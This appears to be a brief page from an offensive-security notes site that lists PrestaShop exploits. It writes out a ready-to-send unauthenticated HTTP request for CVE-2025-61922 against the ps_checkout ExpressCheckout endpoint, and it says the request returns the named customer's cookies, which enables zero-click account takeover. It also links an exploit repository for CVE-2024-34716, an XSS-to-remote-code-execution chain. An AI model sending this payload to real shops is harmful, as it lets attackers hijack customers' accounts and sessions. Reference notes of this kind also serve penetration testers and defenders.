search

Prestashop

Prestashop exploits

hashtag
CVE-2025-61922: Zero-Click Account Takeover on Prestashop

CVE-2025-61922: Zero-Click Account Takeover on PrestashopDhakal's Infosec Blogchevron-right
POST /module/ps_checkout/ExpressCheckout HTTP/1.1
Host: localhost:3000
Content-Length: 72

{"orderID":"1","order":{"payer":{"email_address":"presta@example.com"}}}

Sending this unauthenticated request gives a 500 error along with the cookies of the customer with email presta@example.com.

hashtag
CVE-2024-34716

Prestashop 8.1.5

LogoCVE-2024-34716 – The Deceptive PNG Trap: Breaking Down the PNG-Driven Chain from XSS to Remote Code Execution on PrestaShop (<=8.1.5)Ayoub ELMOKHTARchevron-right
LogoGitHub - 0xDTC/Prestashop-CVE-2024-34716GitHubchevron-right
PreviousphpMyAdminNextRoundcube

Last updated